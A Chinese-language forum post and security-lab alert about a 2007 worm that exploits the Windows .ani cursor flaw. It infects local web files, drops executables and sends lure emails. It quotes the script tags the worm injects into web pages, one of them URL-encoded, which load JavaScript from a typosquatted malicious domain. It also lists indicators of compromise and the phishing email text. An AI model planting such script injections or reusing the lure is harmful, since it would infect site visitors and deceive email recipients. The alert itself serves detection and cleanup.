站长小心病毒!!!感染本地网页文件. 今天中了某病毒,例行杀完,一不小心打开本地的一个源文件发现网页内被插入了<script language="javascript" src="http://%6D%61%63%72%2E%6D%69%63%72%6F%66%73%6F%74%2E%63%6F%6D/<removed>.js"></script>代码,一查,原来是近日出来的新病毒,把本地代码感染了.后来一查,靠几千个文件中标了.请大家注意.杀毒完看是不是本地文件感染了.感染了赶快用文件替换工具替换掉病毒代码.不要把病毒网页传到服务器了.更不要在服务器中使用IE. ---------------------------------------------------------------------------- 一个非常不好的消息要告诉大家,利用微软动画光标漏洞的新蠕虫已经现身。我们收到了相关的样本,通过分析,我们已经确认这是一个复合型蠕虫,含有类似熊猫烧香的感染功能、下载其他病毒的功能、发送含有最新.ani漏洞网址邮件的功能、感染html等文件并向这些文件里添加含有最新漏洞网址的功能。由于危险程度非常高,CISRT Lab决定再次发布中度风险警报,提醒广大网友提高警惕! 同时我们建议广大网友、企业网管对以下两个域名和IP进行屏蔽: 2007ip.com microfsot.com 61.153.247.76 蠕虫的大小在13K左右,会释放文件到以下目录: %SYSTEM%\sysload3.exe 或 %SYSTEM%\sysbmw.exe 添加注册表键值: HKCU\Software\Microsoft\Windows\CurrentVersion\Run "System Boot Check"="%SYSTEM%\sysload3.exe" 或 "System Boot Check"="%SYSTEM%\sysbmw.exe" 会发送邮件: 发件人: [email protected] 主题:你和谁视频的时候被拍下的?给你笑死了! 正文: 看你那小样!我看你是出名了! 你看这个地址!你的脸拍的那么清楚!你变明星了! http://macr.microfsot.com/<removed>/134952.htm 感染.HTML .ASPX .HTM .PHP .JSP .ASP和 .EXE文件,并向.HTML .ASPX .HTM .PHP .JSP .ASP文件里植入以下代码: <script src=http://macr.microfsot.com/<removed>.js></script> 或者 <script language="javascript" src="http://%6D%61%63%72%2E%6D%69%63%72%6F%66%73%6F%74%2E%63%6F%6D/<removed>.js"></script> 需要注意的是:邮件和网页中包含的网址都含有利用.ani 0-day漏洞的恶意文件。 病毒还尝试通过U盘传播,在根目录下生成病毒副本tool.exe和自动播放文件autorun.inf。